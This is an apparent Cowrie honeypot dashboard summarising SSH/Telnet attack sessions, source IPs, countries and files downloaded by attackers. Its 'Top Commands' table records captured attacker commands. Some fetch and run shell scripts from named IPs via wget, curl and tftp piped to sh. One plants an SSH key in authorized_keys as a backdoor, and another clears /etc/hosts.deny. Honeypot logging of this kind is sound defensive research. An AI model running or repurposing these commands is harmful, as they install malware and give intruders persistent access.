Cowrie Honeypot Analysis

Data collected from a Cowrie SSH/Telnet honeypot. Last updated: 2025-06-20 02:00:15

Statistics Recent Attacks Visualizations
Connections Over Time
Connections Over Time
347197
Total Sessions
7890
Unique IP Addresses
177283
Commands Executed
15
Downloaded Files
Attack Infrastructure
3598 Data Center
1219 VPN/Proxy
10 Tor Exit Node
138 Unknown
1321 Residential
378 Mobile
237 Education
989 Corporate
Attack Risk Metrics
5775 Known Attackers
816 Suspicious IPs
15 Files Downloaded
60.6% Login Success Rate
Source IP Reputation
Source IP Reputation
Countries - Top 10
Top Countries
Connection Types
Connection Types
Note: 1.7% of connections could not be classified
Recent Attacks
Session ID IP Address Country Connection Type Timestamp Duration Commands
7ad5116cb598 115.247.46.121 India Data Center 2025-06-20 02:00:10 0.44s 0
5d3a264b7395 80.94.95.15 Romania VPN/Proxy 2025-06-20 02:00:09 6.34s 0
2432cd01f508 193.70.87.152 France Data Center 2025-06-20 01:58:54 1.47s 0
860b666d5faf 5.255.100.18 The Netherlands VPN/Proxy 2025-06-20 01:58:35 14.38s 0
7dcab99913da 5.78.139.241 United States VPN/Proxy 2025-06-20 01:57:51 0.40s 0
1c13e17e2d07 5.255.100.18 The Netherlands VPN/Proxy 2025-06-20 01:56:29 5.84s 0
65b2b2726669 193.70.87.152 France Data Center 2025-06-20 01:55:27 1.47s 0
b899bee23acd 5.255.100.18 The Netherlands VPN/Proxy 2025-06-20 01:54:16 12.50s 0
ab6b3020d7aa 5.255.100.18 The Netherlands VPN/Proxy 2025-06-20 01:52:12 6.73s 0
1298620e30b1 193.70.87.152 France Data Center 2025-06-20 01:51:54 0.49s 0
Recent File Downloads
SHA256 Hash Filename Source IP Country VirusTotal First Seen
d32dae7719d18880... honeypot_test_file.txt 195.178.110.160 Bulgaria 0/62 2025-06-18 10:42:57
4355a46b19d348dc... null 47.83.124.121 Hong Kong 0/62 2025-06-18 01:08:43
16174ef4d82f50eb... gay.sh 141.98.10.162 Lithuania 24/61 2025-06-18 00:01:57
791589bc3cc5657d... ssh.sh 141.98.10.162 Lithuania 25/62 2025-06-17 17:34:48
a17fcf0a2f50e2d4... real.txt 176.88.3.62 Türkiye 0/62 2025-06-15 17:02:24
Top Commands
Command Count
echo -e "\x6F\x6B" 133953
cd ~; chattr -ia .ssh; lockr -ia .ssh 14402
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ 14397
uname -s -v -n -r -m 8610
uname -s -v -n -r 590
(nproc; uname -a) |tr '\n' '|' 581
nproc ; uname -a 581
cd /tmp; wget http://213.209.143.44/ssh.sh -O- |sh;curl -o http://213.209.143.44/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n 356
cd /tmp; wget http://5.255.121.213/gay.sh -O- |sh;curl -o http://5.255.121.213/gay.sh -O-|sh; tftp -r gay.sh -g 5.255.121.213; chmod 777 gay.sh; sh gay.sh;\n 350
uname -a 259
cd /tmp; wget http://107.150.0.18/ssh.sh -O- |sh;curl -o http://107.150.0.18/ssh.sh -O-|sh; tftp -r ssh.sh -g 213.209.143.44; chmod 777 ssh.sh; sh ssh.sh;\n 139
uname -s -m 122
cat /proc/cpuinfo | grep name | wc -l 110
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; 105
whoami 104
Top IP Addresses
IP Address Country Count
162.246.19.141 United States 300022
47.240.63.58 Hong Kong 259509
123.31.24.56 Vietnam 256094
47.83.132.218 Hong Kong 184152
31.145.191.148 Türkiye 63013
47.242.92.52 Hong Kong 60083
189.230.168.139 Mexico 31280
196.251.84.225 The Netherlands 28817
8.219.119.151 Singapore 27604
104.248.40.189 Germany 14015
Top Countries
Country Count
United States 1871
India 559
Hong Kong 491
South Korea 439
Singapore 365
Russia 296
Germany 279
Indonesia 228
Malaysia 220
France 212
Visualizations
Top Usernames
Top Usernames
Top Passwords
Top Passwords
Login Success vs. Failure
Login Success vs. Failure
Top Commands
Top Commands
Session Durations
Session Durations
Top Source IPs
Top Source IPs